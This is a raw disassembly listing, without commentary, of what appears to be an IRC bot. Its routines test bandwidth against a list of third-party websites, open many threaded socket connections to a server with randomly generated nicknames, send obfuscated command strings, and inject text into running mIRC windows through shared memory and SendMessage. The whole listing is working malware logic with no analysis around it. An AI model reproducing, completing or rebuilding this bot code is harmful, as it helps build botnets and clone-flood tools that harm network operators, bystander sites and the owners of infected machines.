mov [ebp+var_40], offset aWww_above_net ; "www.above.net"
mov [ebp+var_3C], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_38], offset aWww_apple_com ; "www.apple.com"
mov [ebp+var_34], offset aWww_nintendo_c ; "www.nintendo.com"
mov [ebp+var_30], offset aGamearena_com_ ; "gamearena.com.au"
mov [ebp+var_2C], offset aWww_conexim_co ; "www.conexim.com.au"
mov [ebp+var_28], offset aUnimelb_edu_au ; "unimelb.edu.au"
mov [ebp+var_24], offset aWww_umin_ac_jp ; "www.umin.ac.jp"
mov [ebp+var_20], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_1C], offset aWww_nthu_edu_t ; "www.nthu.edu.tw"
mov [ebp+var_18], offset aWww_nintendo_0 ; "www.nintendo.co.jp"
mov [ebp+var_14], offset aWww_seikoWatch ; "www.seiko-watch.co.jp"
mov [ebp+var_10], offset aWww_bandai_co_ ; "www.bandai.co.jp"
mov [ebp+var_C], offset aWww_pku_edu_cn ; "www.pku.edu.cn"
mov [ebp+var_8], offset aWww_kaist_ac_k ; "www.kaist.ac.kr"
call sub_429ACC
push 0Fh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_9C]
call sub_425D4F
mov esi, eax
call sub_429ACC
push 0Fh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_9C]
call sub_425D4F
pop ecx
test esi, esi
pop ecx
jz short loc_4260CD
test eax, eax
jz short loc_4260C9
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_4260CF
; ---------------------------------------------------------------------------
loc_4260C9: ; CODE XREF: sub_425F31+18F�j
mov ebx, esi
jmp short loc_4260CF
; ---------------------------------------------------------------------------
loc_4260CD: ; CODE XREF: sub_425F31+18B�j
mov ebx, eax
loc_4260CF: ; CODE XREF: sub_425F31+196�j
; sub_425F31+19A�j
call sub_429ACC
push 0Ch
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_60]
call sub_425D4F
mov edi, eax
call sub_429ACC
push 0Ch
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_60]
call sub_425D4F
pop ecx
test edi, edi
pop ecx
jz short loc_426110
test eax, eax
jz short loc_42610C
lea esi, [eax+edi]
shr esi, 1
jmp short loc_426112
; ---------------------------------------------------------------------------
loc_42610C: ; CODE XREF: sub_425F31+1D2�j
mov esi, edi
jmp short loc_426112
; ---------------------------------------------------------------------------
loc_426110: ; CODE XREF: sub_425F31+1CE�j
mov esi, eax
loc_426112: ; CODE XREF: sub_425F31+1D9�j
; sub_425F31+1DD�j
call sub_429ACC
push 0Bh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_30]
call sub_425D4F
mov edi, eax
call sub_429ACC
push 0Bh
xor edx, edx
pop ecx
div ecx
push [ebp+edx*4+var_30]
call sub_425D4F
pop ecx
test edi, edi
pop ecx
jz short loc_426153
test eax, eax
jz short loc_42614F
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_426155
; ---------------------------------------------------------------------------
loc_42614F: ; CODE XREF: sub_425F31+215�j
mov ecx, edi
jmp short loc_426155
; ---------------------------------------------------------------------------
loc_426153: ; CODE XREF: sub_425F31+211�j
mov ecx, eax
loc_426155: ; CODE XREF: sub_425F31+21C�j
; sub_425F31+220�j
test ebx, ebx
jnz short loc_42616A
test esi, esi
jnz short loc_42616A
test ecx, ecx
jnz short loc_42616A
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_42616A: ; CODE XREF: sub_425F31+226�j
; sub_425F31+22A�j ...
xor eax, eax
test ebx, ebx
jz short loc_426177
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_42617A
; ---------------------------------------------------------------------------
loc_426177: ; CODE XREF: sub_425F31+23D�j
push 2
pop edi
loc_42617A: ; CODE XREF: sub_425F31+244�j
test esi, esi
jz short loc_426182
add eax, esi
jmp short loc_426183
; ---------------------------------------------------------------------------
loc_426182: ; CODE XREF: sub_425F31+24B�j
dec edi
loc_426183: ; CODE XREF: sub_425F31+24F�j
test ecx, ecx
jz short loc_42618B
add eax, ecx
jmp short loc_42618C
; ---------------------------------------------------------------------------
loc_42618B: ; CODE XREF: sub_425F31+254�j
dec edi
loc_42618C: ; CODE XREF: sub_425F31+258�j
xor edx, edx
div edi
cmp [ebp+var_AC], 0
push eax
push ecx
push esi
push ebx
lea eax, [ebp+var_130]
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push offset aSEuropeDKbitSU ; "%s ~ Europe[%d kbit/s] ~ USA[%d kbit/s]"...
push eax
push [ebp+arg_0]
jnz short loc_4261B8
call sub_41CD84
jmp short loc_4261BD
; ---------------------------------------------------------------------------
loc_4261B8: ; CODE XREF: sub_425F31+27E�j
call sub_41CD0E
loc_4261BD: ; CODE XREF: sub_425F31+285�j
add esp, 20h
push [ebp+var_B0]
call sub_42355A
pop ecx
push 0
call dword_437170 ; ExitThread
sub_425F31 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4261D4 proc near ; CODE XREF: sub_420399+46C�p
; sub_426402+2F�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_456FB0 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_426250
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_456F18 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_456F5C ; inet_addr
cmp eax, esi
jnz short loc_426235
push [ebp+arg_0]
call dword_456FB4 ; gethostbyname
test eax, eax
jz short loc_426250
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_426235: ; CODE XREF: sub_4261D4+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_456E9C ; connect
cmp eax, esi
jnz short loc_426254
push edi
call dword_456FD0 ; closesocket
loc_426250: ; CODE XREF: sub_4261D4+1B�j
; sub_4261D4+58�j
mov eax, esi
jmp short loc_426256
; ---------------------------------------------------------------------------
loc_426254: ; CODE XREF: sub_4261D4+73�j
mov eax, edi
loc_426256: ; CODE XREF: sub_4261D4+7E�j
pop edi
pop esi
leave
retn
sub_4261D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42625A proc near ; CODE XREF: sub_40A938+3C9A�p
; sub_40A938+3CA7�p
var_40 = byte ptr -40h
var_36 = byte ptr -36h
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
push 0C8h
mov ebx, offset byte_6607E0
push 0
push ebx
call sub_429690
push 10h
mov esi, offset a0123456789abcd ; "0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZab"...
pop ecx
lea edi, [ebp+var_40]
lea eax, [ebp+var_40]
rep movsd
push eax
call sub_4292D0
add esp, 10h
mov edi, eax
xor esi, esi
loc_426292: ; CODE XREF: sub_42625A+62�j
call sub_429ACC
test esi, esi
cdq
jz short loc_4262AA
idiv edi
mov al, [ebp+edx+var_40]
mov byte_6607E0[esi], al
jmp short loc_4262B8
; ---------------------------------------------------------------------------
loc_4262AA: ; CODE XREF: sub_42625A+40�j
lea ecx, [edi-0Ah]
idiv ecx
mov al, [ebp+edx+var_36]
mov byte_6607E0, al
loc_4262B8: ; CODE XREF: sub_42625A+4E�j
inc esi
cmp esi, 67h
jl short loc_426292
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_42625A endp
; =============== S U B R O U T I N E =======================================
sub_4262C5 proc near ; CODE XREF: sub_40A938+2BE2�p
; sub_40A938+2C90�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_440D78 ; "\n"
push edi
call sub_42A510
pop ecx
mov esi, offset dword_6608AC
pop ecx
loc_4262DD: ; CODE XREF: sub_4262C5+42�j
cmp dword ptr [esi-4], 1
jnz short loc_4262FB
cmp dword ptr [esi], 0
jbe short loc_4262FB
push 0
push edi
call sub_4292D0
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_456F6C ; send
loc_4262FB: ; CODE XREF: sub_4262C5+1C�j
; sub_4262C5+21�j
add esi, 410h
cmp esi, offset dword_66D3CC
jl short loc_4262DD
pop edi
pop esi
retn
sub_4262C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42630C proc near ; CODE XREF: sub_426402+1B8�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
mov esi, offset asc_43D938 ; " "
push edi
push esi
push [ebp+arg_0]
call sub_429B8E
xor edi, edi
pop ecx
inc edi
pop ecx
mov [ebp+var_20], eax
xor ebx, ebx
loc_426330: ; CODE XREF: sub_42630C+35�j
push esi
push ebx
call sub_429B8E
mov [ebp+edi*4+var_20], eax
inc edi
pop ecx
cmp edi, 8
pop ecx
jl short loc_426330
cmp [ebp+var_20], ebx
mov edi, [ebp+var_1C]
jnz short loc_426357
cmp edi, ebx
jnz short loc_426357
xor eax, eax
inc eax
jmp loc_4263FD
; ---------------------------------------------------------------------------
loc_426357: ; CODE XREF: sub_42630C+3D�j
; sub_42630C+41�j
push [ebp+var_20]
mov esi, dword_437174
push offset aSpxmrGVbi0 ; "spxMr/G/vBI0"
call esi ; dword_437174
test eax, eax
push edi
jnz short loc_426387
push offset a2nru_kpknx ; "/2nRu.KpKNx/"
lea eax, [ebp+var_220]
push offset aSS_0 ; "%s %s\n"
push eax
call sub_429A33
add esp, 10h
jmp short loc_4263DC
; ---------------------------------------------------------------------------
loc_426387: ; CODE XREF: sub_42630C+5E�j
push offset a433 ; "433"
call esi ; dword_437174
test eax, eax
jz short loc_42639E
push edi
push offset a432 ; "432"
call esi ; dword_437174
test eax, eax
jnz short loc_4263FB
loc_42639E: ; CODE XREF: sub_42630C+84�j
push 200h
lea eax, [ebp+var_420]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_420]
push eax
call sub_426698
lea eax, [ebp+var_420]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_220]
push offset aSS_0 ; "%s %s\n"
push eax
call sub_429A33
add esp, 20h
loc_4263DC: ; CODE XREF: sub_42630C+79�j
lea eax, [ebp+var_220]
push ebx
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call dword_456F6C ; send
loc_4263FB: ; CODE XREF: sub_42630C+90�j
xor eax, eax
loc_4263FD: ; CODE XREF: sub_42630C+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_42630C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426402 proc near ; DATA XREF: sub_42660A+71�o
var_4008 = byte ptr -4008h
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call sub_429A90
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 410h
xor edi, edi
push dword_660AB4[esi]
lea eax, dword_6608B4[esi]
inc edi
push eax
mov dword_6608A8[esi], edi
call sub_4261D4
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_6608AC[esi], eax
jb loc_4265EA
mov edi, 1000h
lea eax, [ebp+var_2008]
push edi
push ebx
push eax
call sub_429690
add esp, 0Ch
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
lea eax, [ebp+var_2008]
push eax
call sub_426698
lea eax, [ebp+var_4008]
push eax
call sub_426698
lea eax, [ebp+var_3008]
push eax
call sub_426698
lea eax, dword_660AB8[esi]
push eax
push offset a7lybp1gunfm0_0 ; "7LybP1GuNfm0"
lea eax, [ebp+var_1008]
push offset aSS_0 ; "%s %s\n"
push eax
call sub_429A33
add esp, 20h
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_6608AC[esi]
call dword_456F6C ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+var_4008]
push eax
lea eax, [ebp+var_2008]
push offset a391myLxl28__0 ; "391mY/LxL28."
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_1008]
push offset aSSSSMail_gmail ; "%s %s\n%s %s \"mail.gmail.com\" \"127.0.0.1"...
push eax
call sub_429A33
add esp, 28h
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_6608AC[esi]
call dword_456F6C ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_429690
add esp, 0Ch
loc_426544: ; CODE XREF: sub_426402+1E3�j
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_1008]
push ebx
push edi
push eax
push dword_6608AC[esi]
call dword_456F38 ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_4265EA
xor eax, eax
cmp [ebp+var_8], ebx
jmp short loc_4265E0
; ---------------------------------------------------------------------------
loc_426578: ; CODE XREF: sub_426402+1E1�j
mov al, [ebp+eax+var_1008]
cmp al, 0Dh
jz short loc_42659F
cmp al, 0Ah
jz short loc_42659F
cmp [ebp+arg_0], 0FA0h
jz short loc_42659F
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+var_2008], al
jmp short loc_4265D9
; ---------------------------------------------------------------------------
loc_42659F: ; CODE XREF: sub_426402+17F�j
; sub_426402+183�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4265D9
push dword_6608AC[esi]
mov [ebp+eax+var_2008], bl
lea eax, [ebp+var_2008]
push eax
call sub_42630C
pop ecx
test eax, eax
pop ecx
ja short loc_4265EA
push edi
lea eax, [ebp+var_2008]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_4265D9: ; CODE XREF: sub_426402+19B�j
; sub_426402+1A2�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
loc_4265E0: ; CODE XREF: sub_426402+174�j
mov [ebp+var_4], eax
jnz short loc_426578
jmp loc_426544
; ---------------------------------------------------------------------------
loc_4265EA: ; CODE XREF: sub_426402+40�j
; sub_426402+16D�j ...
mov dword_6608A8[esi], ebx
mov esi, dword_6608AC[esi]
cmp esi, ebx
jbe short loc_426601
push esi
call dword_456FD0 ; closesocket
loc_426601: ; CODE XREF: sub_426402+1F6�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_426402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42660A proc near ; CODE XREF: sub_40A938+2AA8�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
cmp [ebp+arg_8], 0
push ebx
push esi
push edi
jle short loc_426693
mov edi, dword_4370A4
loc_426622: ; CODE XREF: sub_42660A+87�j
xor ebx, ebx
mov eax, offset dword_6608A8
loc_426629: ; CODE XREF: sub_42660A+2F�j
cmp dword ptr [eax], 0
jz short loc_42663B
add eax, 410h
inc ebx
cmp eax, offset byte_66D3C8
jl short loc_426629
loc_42663B: ; CODE XREF: sub_42660A+22�j
cmp ebx, 31h
jz short loc_426693
mov esi, ebx
push [ebp+arg_0]
imul esi, 410h
lea eax, dword_6608B4[esi]
push eax
call edi ; dword_4370A4
mov eax, [ebp+arg_4]
push [ebp+arg_C]
mov dword_660AB4[esi], eax
lea eax, dword_660AB8[esi]
push eax
call edi ; dword_4370A4
lea eax, [ebp+var_8]
mov dword_6608A8[esi], 1
push eax
xor eax, eax
push eax
push ebx
push offset sub_426402
push eax
push eax
call dword_43717C ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_426622
loc_426693: ; CODE XREF: sub_42660A+10�j
; sub_42660A+34�j
pop edi
pop esi
pop ebx
leave
retn
sub_42660A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426698 proc near ; CODE XREF: sub_40A938+31D4�p
; sub_40A938+3F31�p ...
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h
lea eax, [ebp+var_2C]
push 0
push eax
call sub_429690
add esp, 0Ch
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
mov [ebp+var_4], eax
fild [ebp+var_4]
fmul dbl_437398
call sub_42A910
cmp eax, 1
jnz short loc_4266EF
call sub_429ACC
call sub_429ACC
push 67h
cdq
pop ecx
idiv ecx
push off_44F680[edx*4]
jmp short loc_426708
; ---------------------------------------------------------------------------
loc_4266EF: ; CODE XREF: sub_426698+3C�j
call sub_429ACC
call sub_429ACC
cdq
mov ecx, 0DFh
idiv ecx
push off_44F300[edx*4]
loc_426708: ; CODE XREF: sub_426698+55�j
lea eax, [ebp+var_2C]
push eax
call dword_4370A4 ; lstrcpyA
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
push eax
call sub_4292D0
pop ecx
mov ebx, eax
push 13h
mov [ebp+var_4], ebx
pop eax
sub eax, ebx
mov dword ptr [ebp+var_18+4], eax
call sub_429ACC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul dbl_437390
call sub_42A910
mov esi, eax
call sub_429ACC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fimul [ebp+var_4]
fmul dbl_437388
call sub_42A910
cmp ebx, 2
mov edi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
jle short loc_42677A
cmp ebx, 3
jnz short loc_426771
cmp esi, 1
jz short loc_42677A
loc_426771: ; CODE XREF: sub_426698+D2�j
cmp eax, 1
jnz loc_426833
loc_42677A: ; CODE XREF: sub_426698+CD�j
; sub_426698+D7�j
call sub_429ACC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul dbl_437380
call sub_42A910
push off_44F680[eax*4]
lea eax, [ebp+var_40]
push eax
call dword_4370A4 ; lstrcpyA
lea esi, [ebp+ebx+var_2C]
movsx eax, byte ptr [esi-1]
push eax
push edi
call sub_42B0D0
pop ecx
test eax, eax
pop ecx
jnz short loc_426820
movsx eax, [ebp+var_40]
push eax
push edi
call sub_42B0D0
pop ecx
test eax, eax
pop ecx
jnz short loc_426820
call sub_429ACC
mov dword ptr [ebp+var_10+4], eax
dec ebx
fild dword ptr [ebp+var_10+4]
mov dword ptr [ebp+var_10+4], ebx
fild dword ptr [ebp+var_10+4]
fmulp st(1), st
fmul dbl_437388
call sub_42A910
cmp eax, 1
jnz short loc_426820
push edi
call sub_4292D0
and dword ptr [ebp+var_10+4], 0
mov dword ptr [ebp+var_10], eax
fild [ebp+var_10]
pop ecx
fstp qword ptr [ebp-8]
call sub_429ACC
mov dword ptr [ebp+var_10+4], eax
fild dword ptr [ebp+var_10+4]
fmul qword ptr [ebp-8]
fmul dbl_437388
call sub_42A910
mov al, byte ptr aAbcdefghijkl_0[eax] ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
mov [esi], al
loc_426820: ; CODE XREF: sub_426698+11C�j
; sub_426698+12D�j ...
push dword ptr [ebp+var_18+4]
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_429910
add esp, 0Ch
loc_426833: ; CODE XREF: sub_426698+DC�j
lea eax, [ebp+var_2C]
push eax
call sub_4292D0
mov esi, eax
mov [ebp+var_4], esi
movsx eax, [ebp+esi+var_2D]
push eax
call sub_42C454
pop ecx
test eax, eax
pop ecx
jnz loc_426A8A
movsx eax, [ebp+esi+var_2D]
push eax
push edi
xor ebx, ebx
call sub_42B0D0
pop ecx
test eax, eax
pop ecx
jnz loc_42698C
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
lea eax, [esi+3]
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_437388
call sub_42A910
cmp esi, 3
jz short loc_42689D
cmp eax, 1
jnz loc_42698C
loc_42689D: ; CODE XREF: sub_426698+1FA�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_4268E1
push edi
call sub_4292D0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul dbl_437388
call sub_42A910
mov al, byte ptr aAbcdefghijkl_0[eax] ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
mov [ebp+esi+var_2C], al
jmp short loc_4268FF
; ---------------------------------------------------------------------------
loc_4268E1: ; CODE XREF: sub_426698+20E�j
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437378
call sub_42A910
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_4268FF: ; CODE XREF: sub_426698+247�j
inc esi
xor ebx, ebx
mov [ebp+var_4], esi
inc ebx
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437370
call sub_42A910
cmp esi, 3
jz short loc_426925
cmp eax, ebx
jnz short loc_42698C
loc_426925: ; CODE XREF: sub_426698+287�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_42696A
push edi
call sub_4292D0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp [ebp+var_10]
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul [ebp+var_10]
fmul dbl_437388
call sub_42A910
mov al, byte ptr aAbcdefghijkl_0[eax] ; "abcdefghijklmnopqrstuvwxyz1234567890-|`"...
mov [ebp+esi+var_2C], al
jmp short loc_426988
; ---------------------------------------------------------------------------
loc_42696A: ; CODE XREF: sub_426698+297�j
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437378
call sub_42A910
mov cl, 41h
sub cl, al
mov [ebp+esi+var_2C], cl
loc_426988: ; CODE XREF: sub_426698+2D0�j
inc esi
mov [ebp+var_4], esi
loc_42698C: ; CODE XREF: sub_426698+1D0�j
; sub_426698+1FF�j ...
cmp esi, 6
jge short loc_426A0C
call sub_429ACC
cmp esi, 5
jge short loc_4269A9
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437390
jmp short loc_4269C2
; ---------------------------------------------------------------------------
loc_4269A9: ; CODE XREF: sub_426698+301�j
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_437388
loc_4269C2: ; CODE XREF: sub_426698+30F�j
call sub_42A910
test eax, eax
jnz short loc_4269E5
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437368
call sub_42A910
mov cl, 30h
jmp short loc_426A02
; ---------------------------------------------------------------------------
loc_4269E5: ; CODE XREF: sub_426698+331�j
cmp eax, 1
jnz short loc_426A0C
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437378
call sub_42A910
mov cl, 41h
loc_426A02: ; CODE XREF: sub_426698+34B�j
sub cl, al
mov [ebp+esi+var_2C], cl
inc esi
mov [ebp+var_4], esi
loc_426A0C: ; CODE XREF: sub_426698+2F7�j
; sub_426698+350�j
cmp ebx, 2
jge short loc_426A8A
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul dbl_437388
call sub_42A910
cmp eax, 1
jnz short loc_426A8A
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437368
call sub_42A910
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2C], cl
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437360
call sub_42A910
cmp eax, 1
jnz short loc_426A8A
cmp ebx, eax
jge short loc_426A8A
call sub_429ACC
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_437358
call sub_42A910
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_426A8A: ; CODE XREF: sub_426698+1B8�j
; sub_426698+377�j ...
lea eax, [ebp+var_2C]
push 14h
push eax
push [ebp+arg_0]
call sub_429C40
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_426698 endp
; =============== S U B R O U T I N E =======================================
sub_426AA3 proc near ; CODE XREF: sub_40A938+4620�p
push esi
mov esi, offset dword_6608AC
loc_426AA9: ; CODE XREF: sub_426AA3+2D�j
cmp dword ptr [esi-4], 1
jnz short loc_426ABC
mov eax, [esi]
test eax, eax
jbe short loc_426ABC
push eax
call dword_456FD0 ; closesocket
loc_426ABC: ; CODE XREF: sub_426AA3+A�j
; sub_426AA3+10�j
push dword ptr [esi]
call dword_4372D4 ; closesocket
add esi, 410h
cmp esi, offset dword_66D3CC
jl short loc_426AA9
xor eax, eax
pop esi
retn
sub_426AA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426AD6 proc near ; DATA XREF: sub_426C22+B�o
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
push esi
lea eax, [ebp+var_204]
push 200h
push eax
push [ebp+arg_0]
call dword_43726C ; GetClassNameA
mov esi, offset aMirc ; "mIRC"
lea eax, [ebp+var_204]
push esi
push eax
call sub_42A7F0
pop ecx
test eax, eax
pop ecx
jnz short loc_426B74
push ebx
push esi
xor esi, esi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4370B8 ; CreateFileMappingA
push esi
push esi
mov ebx, eax
push esi
push 0F001Fh
push ebx
call dword_437040 ; MapViewOfFile
push [ebp+arg_4]
mov [ebp+var_4], eax
push offset aS_5 ; "%s"
push eax
call dword_437274 ; wsprintfA
add esp, 0Ch
push esi
push 1
push 4C8h
push [ebp+arg_0]
call dword_437270 ; SendMessageA
push [ebp+var_4]
call dword_437048 ; UnmapViewOfFile
push ebx
call dword_437044 ; CloseHandle
mov dword_6607C8, 1
pop ebx
loc_426B74: ; CODE XREF: sub_426AD6+35�j
xor eax, eax
pop esi
inc eax
leave
retn 8
sub_426AD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B7C proc near ; DATA XREF: sub_426C22+1A�o
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
push esi
lea eax, [ebp+var_204]
push 200h
push eax
push [ebp+arg_0]
call dword_43726C ; GetClassNameA
mov esi, offset aMirc32 ; "mIRC32"
lea eax, [ebp+var_204]
push esi
push eax
call sub_42A7F0
pop ecx
test eax, eax
pop ecx
jnz short loc_426C1A
push ebx
push esi
xor esi, esi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call dword_4370B8 ; CreateFileMappingA
push esi
push esi
mov ebx, eax
push esi
push 0F001Fh
push ebx
call dword_437040 ; MapViewOfFile
push [ebp+arg_4]
mov [ebp+var_4], eax
push offset aS_5 ; "%s"
push eax
call dword_437274 ; wsprintfA
add esp, 0Ch
push esi
push 1
push 4C8h
push [ebp+arg_0]
call dword_437270 ; SendMessageA
push [ebp+var_4]
call dword_437048 ; UnmapViewOfFile
push ebx
call dword_437044 ; CloseHandle
mov dword_6607C8, 1
pop ebx
loc_426C1A: ; CODE XREF: sub_426B7C+35�j
xor eax, eax
pop esi
inc eax
leave
retn 8
sub_426B7C endp
; =============== S U B R O U T I N E =======================================
sub_426C22 proc near ; CODE XREF: sub_40A938+27D8�p
arg_0 = dword ptr 4
push [esp+arg_0]
and dword_6607C8, 0
push offset sub_426AD6
call dword_456FCC ; EnumWindows
push [esp+arg_0]
push offset sub_426B7C
call dword_456FCC ; EnumWindows
mov eax, dword_6607C8
retn
sub_426C22 endp
; ---------------------------------------------------------------------------
loc_426C4D: ; CODE XREF: .text:00436593�j
; .text:0043659B�j ...
mov eax, [ecx]
test eax, eax
jz short locret_426C59
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_426C59: ; CODE XREF: .text:00426C51�j
retn
; =============== S U B R O U T I N E =======================================
